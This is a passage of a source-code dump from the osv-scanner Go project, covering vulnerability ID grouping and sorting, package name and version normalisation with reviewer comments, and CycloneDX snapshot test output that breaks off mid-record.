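	slices.SortFunc(c, identifiers.MostUpstreamsOrder)
	for _, v := range c {
		idAliases := IDAliases{
			ID: v.GetId(),
			// Copy, so the appends below cannot write into spare capacity of
			// the vulnerability's own alias slice.
			Aliases: slices.Clone(v.GetAliases()),
		}

		idAliases.Aliases = append(idAliases.Aliases, v.GetUpstream()...)

		// For Ubuntu Security Advisory data,
		// all related CVEs should be bundled together, as they are part of this USN.
		// TODO(jesslowe): remove after all USNs are migrated.
		if strings.Split(v.GetId(), "-")[0] == "USN" {
			idAliases.Aliases = append(idAliases.Aliases, v.GetRelated()...)
		}

		output = append(output, idAliases)
	}

	return output
}

================================================
FILE: internal/grouper/grouper_test.go
================================================
package grouper_test

import (
	"testing"

	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scanner/v2/internal/grouper"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func TestGroup(t *testing.T) {
	t.Parallel()

	// Should be grouped by IDs appearing in alias.
	v1 := grouper.IDAliases{
		ID: "CVE-1",
		Aliases: []string{
			"FOO-1",
		},
	}
	v2 := grouper.IDAliases{
		ID:      "FOO-1",
		Aliases: []string{},
	}
	v3 := grouper.IDAliases{
		ID: "FOO-2",
		Aliases: []string{
			"FOO-1",
		},
	}

	// Should be grouped by aliases intersecting.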
v4 := grouper.IDAliases{ ID: "BAR-1", Aliases: []string{ "CVE-2", "CVE-3", }, } v5 := grouper.IDAliases{ ID: "BAR-2", Aliases: []string{ "CVE-3", "CVE-4", }, } v6 := grouper.IDAliases{ ID: "BAR-3", Aliases: []string{ "CVE-4", }, } // Unrelated. v7 := grouper.IDAliases{ ID: "UNRELATED-1", Aliases: []string{ "BAR-1337", }, } v8 := grouper.IDAliases{ ID: "UNRELATED-2", Aliases: []string{ "BAR-1338", }, } // Unrelated, empty aliases v9 := grouper.IDAliases{ ID: "UNRELATED-3", } v10 := grouper.IDAliases{ ID: "UNRELATED-4", } for _, tc := range []struct { vulns []grouper.IDAliases want []models.GroupInfo }{ { vulns: []grouper.IDAliases{ v1, v2, v3, v4, v5, v6, v7, v8, }, want: []models.GroupInfo{ { IDs: []string{v1.ID, v2.ID, v3.ID}, Aliases: []string{v1.ID, v2.ID, v3.ID}, }, { IDs: []string{v4.ID, v5.ID, v6.ID}, Aliases: []string{v4.ID, v5.ID, v6.ID, v4.Aliases[0], v4.Aliases[1], v5.Aliases[1]}, }, { IDs: []string{v7.ID}, Aliases: []string{v7.Aliases[0], v7.ID}, }, { IDs: []string{v8.ID}, Aliases: []string{v8.Aliases[0], v8.ID}, }, }, }, { vulns: []grouper.IDAliases{ v8, v2, v1, v5, v7, v4, v6, v3, v9, v10, }, want: []models.GroupInfo{ { IDs: []string{v8.ID}, Aliases: []string{v8.Aliases[0], v8.ID}, }, { IDs: []string{v1.ID, v2.ID, v3.ID}, // Deterministic order Aliases: []string{v1.ID, v2.ID, v3.ID}, // Deterministic order }, { IDs: []string{v4.ID, v5.ID, v6.ID}, Aliases: []string{v4.ID, v5.ID, v6.ID, v4.Aliases[0], v4.Aliases[1], v5.Aliases[1]}, }, { IDs: []string{v7.ID}, Aliases: []string{v7.Aliases[0], v7.ID}, }, { IDs: []string{v9.ID}, Aliases: []string{v9.ID}, }, { IDs: []string{v10.ID}, Aliases: []string{v10.ID}, }, }, }, { vulns: []grouper.IDAliases{ v9, v10, }, want: []models.GroupInfo{ { IDs: []string{v9.ID}, Aliases: []string{v9.ID}, }, { IDs: []string{v10.ID}, Aliases: []string{v10.ID}, }, }, }, } { grouped := grouper.Group(tc.vulns) if diff := cmp.Diff(tc.want, grouped); diff != "" { t.Errorf("GroupedVulns() returned an unexpected result (-want +got):\n%s", 
diff) } } } ================================================ FILE: internal/identifiers/identifiers.go ================================================ // Package identifiers provides functions for sorting vulnerability identifiers. package identifiers import ( "strings" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // MostUpstreamsOrder orders by which vuln has the most upstreams, // thereby finding the furthest downstream vuln identifier. func MostUpstreamsOrder(a, b *osvschema.Vulnerability) int { if len(a.GetUpstream()) > len(b.GetUpstream()) { return -1 } else if len(a.GetUpstream()) < len(b.GetUpstream()) { return 1 } return IDSortFunc(a.GetId(), b.GetId()) } func prefixOrder(prefix string) int { switch prefix { case "DSA", "USN": // Special case: For container scanning, DSA contains multiple CVEs and is more accurate. return 3 case "CVE": // Highest precedence for normal cases return 2 case "GHSA": // Lowest precedence return 0 } return 1 } func prefixOrderForDescription(prefix string) int { switch prefix { case "CVE": return 0 case "GHSA": return 1 } return 2 } func idSort(a, b string, prefixOrd func(string) int) int { prefixAOrd := prefixOrd(strings.Split(a, "-")[0]) prefixBOrd := prefixOrd(strings.Split(b, "-")[0]) if prefixAOrd > prefixBOrd { return -1 } else if prefixAOrd < prefixBOrd { return 1 } return strings.Compare(a, b) } // IDSortFunc sorts IDs ascending by CVE < [ECO-SPECIFIC] < GHSA func IDSortFunc(a, b string) int { return idSort(a, b, prefixOrder) } // IDSortFuncForDescription sorts ID ascending by [ECO-SPECIFIC] < GHSA < CVE func IDSortFuncForDescription(a, b string) int { return idSort(a, b, prefixOrderForDescription) } ================================================ FILE: internal/identifiers/identifiers_test.go ================================================ package identifiers import ( "slices" "testing" ) func Test_idSortFunc(t *testing.T) { t.Parallel() type args struct { a string b string } tests := []struct { name string 
args args want int }{ { args: args{ a: "CVE-2012-1234", b: "ANYTHING-2012-1234", }, want: -1, }, { args: args{ a: "GHSA-2012-1234", b: "ANYTHING-2012-1234", }, want: 1, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := IDSortFunc(tt.args.a, tt.args.b); got != tt.want { t.Errorf("idSortFunc() = %v, want %v", got, tt.want) } }) } } func Test_idSortFuncUsage(t *testing.T) { t.Parallel() tests := []struct { name string args []string want string }{ { args: []string{ "CVE-2012-1234", "ANYTHING-2012-1234", }, want: "CVE-2012-1234", }, { args: []string{ "GHSA-2012-1234", "RUSTSEC-2012-1234", }, want: "RUSTSEC-2012-1234", }, { args: []string{ "CVE-2012-1234", "DSA-2012-1234", }, want: "DSA-2012-1234", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := slices.MinFunc(tt.args, IDSortFunc); got != tt.want { t.Errorf("slices.MinFunc = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/imodels/imodels.go ================================================ // Package imodels defines internal models for osv-scanner. 
package imodels

import (
	"fmt"
	"strings"
	"sync"

	"github.com/google/osv-scalibr/converter"
	"github.com/google/osv-scalibr/extractor"
	archivemetadata "github.com/google/osv-scalibr/extractor/filesystem/language/java/archive/metadata"
	apkmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/apk/metadata"
	dpkgmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg/metadata"
	rpmmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/rpm/metadata"
	"github.com/google/osv-scalibr/inventory/osvecosystem"
	"github.com/google/osv-scanner/v2/internal/cachedregexp"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo"
	"github.com/google/osv-scanner/v2/internal/scalibrplugin"
	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/internal/utility/semverlike"

	scalibrosv "github.com/google/osv-scalibr/extractor/filesystem/osv"

	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

// gitExtractors is the set of extractor plugin names that SourceType reports
// as models.SourceTypeGit.
var gitExtractors = map[string]struct{}{
	gitrepo.Name: {},
}

// todo: SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete
// cache memoises the PURL-derived package info per package pointer; nothing in
// this file removes entries from it.
var cache = sync.Map{} // map[*extractor.Package]*models.PackageInfo

// toCachedPackageInfo returns the PURL-derived package info for an SBOM
// package, computing and caching it on first use. It returns nil when pkg is
// not an SBOM package or when no PURL can be built for it.
func toCachedPackageInfo(pkg *extractor.Package) *models.PackageInfo {
	if SourceType(pkg) != models.SourceTypeSBOM {
		return nil
	}

	v, ok := cache.Load(pkg)
	if !ok {
		purlStruct := converter.ToPURL(pkg)
		if purlStruct == nil {
			return nil
		}
		// NOTE(review): the error from purl.ToPackage is discarded, so a PURL
		// that fails to convert is cached and returned as whatever value came
		// back with the error. Name/Version/Ecosystem then use that value
		// instead of falling back to the extractor's data - confirm this is
		// intended, since a package with a wrong or empty name will not match
		// any advisory.
		purlCache, _ := purl.ToPackage(purlStruct.String())
		cache.Store(pkg, &purlCache)

		return &purlCache
	}
	// Only non-nil pointers are stored above, so this guard looks unreachable
	// from the code in this file.
	if v == nil {
		return nil
	}

	return v.(*models.PackageInfo)
}

// Name returns the package name to use when querying for vulnerabilities.
//
// The first rule that applies wins, in this order: PURL-derived name for SBOM
// packages; "stdlib" for the Go package named "go"; PEP 503 normalised name
// for PyPI; "group:artifact" for Java archive metadata; dpkg source name; apk
// origin name; repository for the GIT ecosystem; otherwise pkg.Name.
func Name(pkg *extractor.Package) string {
	// TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete
	if purlCache := toCachedPackageInfo(pkg); purlCache != nil {
		return purlCache.Name
	}

	// --- Make specific patches to names as necessary ---
	// Patch Go package to stdlib
	if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && pkg.Name == "go" {
		return "stdlib"
	}

	// TODO: Move the normalization to another where matching logic happens.
	// Patch python package names to be normalized
	if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemPyPI {
		// per https://peps.python.org/pep-0503/#normalized-names
		return strings.ToLower(cachedregexp.MustCompile(`[-_.]+`).ReplaceAllLiteralString(pkg.Name, "-"))
	}

	// Patch Maven archive extractor package names
	if metadata, ok := pkg.Metadata.(*archivemetadata.Metadata); ok {
		if metadata.ArtifactID != "" && metadata.GroupID != "" {
			return metadata.GroupID + ":" + metadata.ArtifactID
		}
	}

	// --- OS metadata ---
	if metadata, ok := pkg.Metadata.(*dpkgmetadata.Metadata); ok {
		// Debian uses source name on osv.dev
		// (fallback to using the normal name if source name is empty)
		if metadata.SourceName != "" {
			return metadata.SourceName
		}
	}

	if metadata, ok := pkg.Metadata.(*apkmetadata.Metadata); ok {
		if metadata.OriginName != "" {
			return metadata.OriginName
		}
	}

	if Ecosystem(pkg).String() == "GIT" && pkg.SourceCode != nil && pkg.SourceCode.Repo != "" {
		return pkg.SourceCode.Repo
	}

	return pkg.Name
}

// Ecosystem returns the ecosystem to query for pkg. It starts from
// pkg.Ecosystem() and lets the osv-scanner JSON metadata and then the
// PURL-derived info (SBOM packages) override it. If an override fails to
// parse, a warning is logged and the value held at that point is returned.
func Ecosystem(pkg *extractor.Package) osvecosystem.Parsed {
	eco := pkg.Ecosystem()

	if metadata, ok := pkg.Metadata.(*osvscannerjson.Metadata); ok {
		newEco, err := osvecosystem.Parse(metadata.Ecosystem)
		if err != nil {
			cmdlogger.Warnf("Warning: error parsing osvscanner.json ecosystem: %s", err.Error())
			return eco
		}
		eco = newEco
	}

	// TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete
	if purlCache := toCachedPackageInfo(pkg); purlCache != nil {
		newEco, err := osvecosystem.Parse(purlCache.Ecosystem)
		if err != nil {
			// NOTE(review): this message names osvscanner.json although the value
			// parsed here comes from the package PURL; the wording can send
			// triage to the wrong input file.
			cmdlogger.Warnf("Warning: error parsing osvscanner.json ecosystem: %s", err.Error())
			return eco
		}
		eco = newEco
	}

	return eco
}

// Version returns the version to use when querying for vulnerabilities: the
// PURL-derived version for SBOM packages, "X.Y.99" for a Go stdlib version
// that has only two components, and pkg.Version otherwise.
func Version(pkg *extractor.Package) string {
	// TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete
	if purlCache := toCachedPackageInfo(pkg); purlCache != nil {
		return purlCache.Version
	}

	// Assume Go stdlib patch version as the latest version
	//
	// This is done because go1.20 and earlier do not support patch
	// version in go.mod file, and will fail to build.
	//
	// However, if we assume patch version as .0, this will cause a lot of
	// false positives. This compromise still allows osv-scanner to pick up
	// when the user is using a minor version that is out-of-support.
	//
	// NOTE(review): the other side of this trade-off is presumably missed
	// findings: with patch 99 assumed, an advisory fixed in a later patch
	// release of the same minor line would not match even when the toolchain
	// actually in use is older. Worth stating in user-facing docs.
	if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && Name(pkg) == "stdlib" {
		v := semverlike.ParseSemverLikeVersion(pkg.Version, 3)
		if len(v.Components) == 2 {
			return fmt.Sprintf(
				"%d.%d.%d",
				v.Components.Fetch(0),
				v.Components.Fetch(1),
				99,
			)
		}
	}

	return pkg.Version
}

// Location returns the package's location path, or "" when it has none.
func Location(pkg *extractor.Package) string {
	return pkg.Location.PathOrEmpty()
}

// Commit returns the source commit recorded for pkg, or "" when pkg carries no
// source code identifier.
func Commit(pkg *extractor.Package) string {
	if pkg.SourceCode != nil {
		return pkg.SourceCode.Commit
	}

	return ""
}

// SourceType classifies pkg by the plugins that produced it. Plugins are
// checked in slice order and the first one that matches any category decides
// the result; within one plugin the order is OS package ("os/" prefix), SBOM,
// git, artifact, lockfile. models.SourceTypeUnknown is returned when no plugin
// matches.
func SourceType(pkg *extractor.Package) models.SourceType {
	for _, extractorName := range pkg.Plugins {
		if strings.HasPrefix(extractorName, "os/") {
			return models.SourceTypeOSPackage
		} else if _, ok := scalibrplugin.ExtractorPresets["sbom"][extractorName]; ok {
			return models.SourceTypeSBOM
		} else if _, ok := gitExtractors[extractorName]; ok {
			return models.SourceTypeGit
		} else if _, ok := scalibrplugin.ExtractorPresets["artifact"][extractorName]; ok {
			return models.SourceTypeArtifact
		} else if _, ok := scalibrplugin.ExtractorPresets["lockfile"][extractorName]; ok {
			return models.SourceTypeProjectPackage
		}
	}

	return models.SourceTypeUnknown
}

// DepGroups returns the dependency groups reported by the package metadata, or
// an empty (non-nil) slice when the metadata does not provide them.
func DepGroups(pkg *extractor.Package) []string {
	if dg, ok := pkg.Metadata.(scalibrosv.DepGroups); ok {
		return dg.DepGroups()
	}

	return []string{}
}

// OSPackageName returns the PackageName field of apk, dpkg or rpm metadata, or
// "" for any other metadata type.
func OSPackageName(pkg *extractor.Package) string {
	if metadata, ok := pkg.Metadata.(*apkmetadata.Metadata); ok {
		return metadata.PackageName
	}
	if metadata, ok := pkg.Metadata.(*dpkgmetadata.Metadata); ok {
		return metadata.PackageName
	}
	if metadata, ok := pkg.Metadata.(*rpmmetadata.Metadata); ok {
		return metadata.PackageName
	}

	return ""
}

================================================
FILE: internal/imodels/imodels_test.go
================================================
package imodels

import (
	"testing"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson"
)

// Test_Name covers the plain-name fallback and the GIT ecosystem rule, with
// and without a repository set.
func Test_Name(t *testing.T) {
	t.Parallel()
	tests := []struct {
		name string
		pkg  *extractor.Package
		want string
	}{
		{
			name: "Regular_package",
			pkg: &extractor.Package{
				Name: "regular-pkg",
			},
			want: "regular-pkg",
		},
		{
			name: "GIT_ecosystem_with_repo",
			pkg: &extractor.Package{
				Name: "openssl@3.5",
				SourceCode: &extractor.SourceCodeIdentifier{
					Repo: "github.com/openssl/openssl",
				},
				Metadata: &osvscannerjson.Metadata{
					Ecosystem: "GIT",
				},
			},
			want: "github.com/openssl/openssl",
		},
		{
			name: "GIT_ecosystem_without_repo",
			pkg: &extractor.Package{
				Name: "openssl@3.5",
				SourceCode: &extractor.SourceCodeIdentifier{
					Repo: "",
				},
				Metadata: &osvscannerjson.Metadata{
					Ecosystem: "GIT",
				},
			},
			want: "openssl@3.5",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			if got := Name(tt.pkg); got != tt.want {
				t.Errorf("Name(*extractor.Package) = %v, want %v", got, tt.want)
			}
		})
	}
}

================================================
FILE: internal/imodels/results/scanresults.go
================================================
// Package results defines the data structures for scan results.
package results

import (
	spb "github.com/google/osv-scalibr/binary/proto/scan_result_go_proto"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scanner/v2/internal/config"
)

// ScanResults represents the complete results of a scan.
// This includes information that affects multiple packages.
type ScanResults struct { Inventory inventory.Inventory PackageScanResults []*extractor.Package // TODO(v2): Temporarily commented out until ScanParameters is moved // to a shared package to avoid cyclic dependencies // The user parameters for the scan // ScanParameters // Scan config ConfigManager config.Manager // For container scanning, metadata including layer information ImageMetadata *spb.ContainerImageMetadata } ================================================ FILE: internal/output/__snapshots__/cyclonedx_test.snap ================================================ [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], 
"purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", 
"type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], 
"vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- 
[TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- 
[TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", 
"licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], 